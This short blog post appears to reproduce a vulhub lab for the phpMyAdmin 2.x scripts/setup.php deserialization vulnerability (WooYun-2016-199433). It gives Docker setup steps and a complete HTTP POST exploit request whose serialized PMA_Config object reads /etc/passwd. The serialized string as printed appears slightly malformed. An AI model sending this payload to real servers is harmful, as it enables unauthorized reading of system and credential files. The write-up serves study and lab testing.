WooYun-2016-199433

kalixcn發表於2024-05-23

Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433)

Affected version:2.x

Setup

cd vulhub/phpmyadmin/WooYun-2016-199433
docker-compose up -d

Visit http://10.10.10.8:8080 and you will see the phpmyadmin home page.Because there is no connection to the database,we will get an error.But this vulnerability is not related to the database,so just ignore.

Exploit

POST /scripts/setup.php HTTP/1.1
Host: 10.10.10.8:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

img